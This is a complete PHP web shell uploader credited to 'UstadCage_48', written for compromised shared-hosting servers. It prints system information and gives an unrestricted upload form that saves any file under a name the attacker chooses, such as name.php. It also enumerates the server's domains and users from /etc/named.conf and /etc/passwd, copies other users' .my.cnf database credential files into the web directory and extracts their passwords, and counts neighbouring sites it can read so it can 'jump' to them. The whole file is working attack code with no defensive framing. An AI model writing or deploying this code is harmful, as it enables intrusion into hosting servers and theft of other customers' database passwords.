uploader

1. <?php
2. // hello kids tau kan harus apa ?
3. // powered by UstadCage_48
4. ?>
5. <title>Uploader</title>
6. <style>
7. body {
8.     color:#000;
9. }
10. input[type=text], input[type=file] {
11.     width:200px;
12.     border:1px solid #000;
13.     margin:3px;
14.     padding:3px;
15. }
16. input[type=submit] {
17.     border:1px solid #000;
18.     margin:3px;
19.     padding:3px;
20. }
21. </style>
22. <center><?=php_uname();?><br><br><form action="" method="post" enctype="multipart/form-data"><input type="file" name="file" />  <br /> <input type="text" name="ufile" value="name.php" />  <br />  <input name="upload" type="submit" value="Upload" /> <input name="" type="submit" value="Cancel" /> </form> <?php
23. // Cpanel
24. @ini_set('display_errors',0);
25. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
26. $ar0=explode($marqueurDebutLien, $text);
27. $ar1=explode($marqueurFinLien, $ar0[$i]);
28.   return trim($ar1[0]);
29. }
30. /* start cpanel functions */
31. function cpanel(){
32. $d0mains = @file('/etc/named.conf');
33. $domains = scandir("/var/named");
34. if ($domains or $d0mains)
35. {
36.     $domains = scandir("/var/named");
37.     if($domains) {
38. $count=1;
39. $dc = 0;
40. $list = scandir("/var/named");
41. foreach($list as $domain){
42. if(strpos($domain,".db")){
43. $domain = str_replace('.db','',$domain);
44. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
45. $dirz = '/home/'.$owner['name'].'/.my.cnf';
46. $path = getcwd();
47. if (is_readable($dirz)) {
48. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
49. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
50. $password=entre2v2($p,'password="','"');
51. $dc++;
52. }}}
53. $total = $dc;
54. echo ''.$total.'';
55. }else{
56. $d0mains = @file('/etc/named.conf');
57.     if($d0mains) {
58. $count=1;
59. $dc = 0;
60. $mck = array();
61. foreach($d0mains as $d0main){
62.     if(@eregi('zone',$d0main)){
63.         preg_match_all('#zone "(.*)"#',$d0main,$domain);
64.         flush();
65. if(strlen(trim($domain[1][0])) >2){
66.             $mck[] = $domain[1][0];
67.         }}}
68. $mck = array_unique($mck);
69. $usr = array();
70. $dmn = array();
71. foreach($mck as $o) {
72.     $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
73.     $usr[] = $infos['name'];
74.     $dmn[] = $o;
75. }
76. array_multisort($usr,$dmn);
77. $dt = file('/etc/passwd');
78. $passwd = array();
79. foreach($dt as $d) {
80.     $r = explode(':',$d);
81.     if(strpos($r[5],'home')) {
82.         $passwd[$r[0]] = $r[5];
83.     }}
84. $l=0;
85. $j=1;
86. foreach($usr as $r) {
87. $dirz = '/home/'.$r.'/.my.cnf';
88. $path = getcwd();
89. if (is_readable($dirz)) {
90. copy($dirz, ''.$path.'/'.$r.'.txt');
91. $p=file_get_contents(''.$path.'/'.$r.'.txt');
92. $password=entre2v2($p,'password="','"');
93. $dc++;
94.                 flush();
95.                 $l=$l?0:1;
96.                 $j++;
97. }}}
98. $total = $dc;
99. echo ''.$total.'';
100. }
101. }else{
102. echo "0";
103. }
104. }
105. // Local Domain
106. function domain(){
107. $file = @implode(@file("/etc/named.conf"));
108. preg_match_all("#named/(.*?).db#",$file ,$r);
109. $domains = array_unique($r[1]);
110. {
111. $do = "".count($domains)."";
112. echo "$do";
113. }}
114. // Jumping
115. function jump(){
116. // Jump IndoXploit
117. $i = 0;
118. $etc = fopen("/etc/passwd", "r");
119. while($passwd = fgets($etc)) {
120. if($passwd == '' || !$etc) {} else {
121. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
122. foreach($user_jumping[1] as $user_idx_jump) {
123. $user_jumping_dir = "/home/$user_idx_jump/public_html";
124. if(is_readable($user_jumping_dir)){
125. $i++;
126. if(is_writable($user_jumping_dir)){}
127. if(function_exists('posix_getpwuid')) {
128. $domain_jump = file_get_contents("/etc/named.conf");   
129. if($domain_jump == '') {} else {
130. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
131. foreach($domains_jump[1] as $dj){
132. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
133. $user_jumping_url = $user_jumping_url['name'];
134. if($user_jumping_url == $user_idx_jump) {
135. break;
136. }}}} else {}}}}}
137. if($i == 0) {
138. $jump = "0";
139. } else {
140. $jump = "".$i."";
141. }
142. // Jump
143. ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('0');
144. set_time_limit(0);
145. @$passwd = fopen('/etc/passwd','r');
146. if(!$passwd){die('0');}
147. $pub = array();
148. $users = array();
149. $conf = array();
150. $i = 0;
151. while(!feof($passwd))
152. {
153. $str = fgets($passwd);
154. if($i>35){
155. $pos = strpos($str,':');
156. $username = substr($str,0,$pos);
157. $dirz = '/home/'.$username.'/public_html/';
158. if(($username!=''))
159. {
160. if(is_readable($dirz)){ array_push($users,$username);
161. array_push($pub,$dirz);
162. }}}
163. $i++;
164. }
165. echo "".sizeof($users)."/".$jump."";
166. }
167.  
168.  
169. if(isset($_REQUEST['ufile'])){
170.     $ufile = $_POST ['ufile' ] ;
171.     }
172. if(isset($_REQUEST['upload'])){
173.     if($_POST ['upload']){
174. if(@copy($_FILES['file']['tmp_name'],$ufile)){
175.     echo "<b>Uploaded !!!</b><br>" ;
176.     } else {
177.         echo "<b>Upload error !!!</b><br>" ;
178.         } } }
179. ?>
180. CPANEL : <?=cpanel();?> | DOMAIN : <?=domain();?> | JUMPING : <?=jump();?>
181. </center>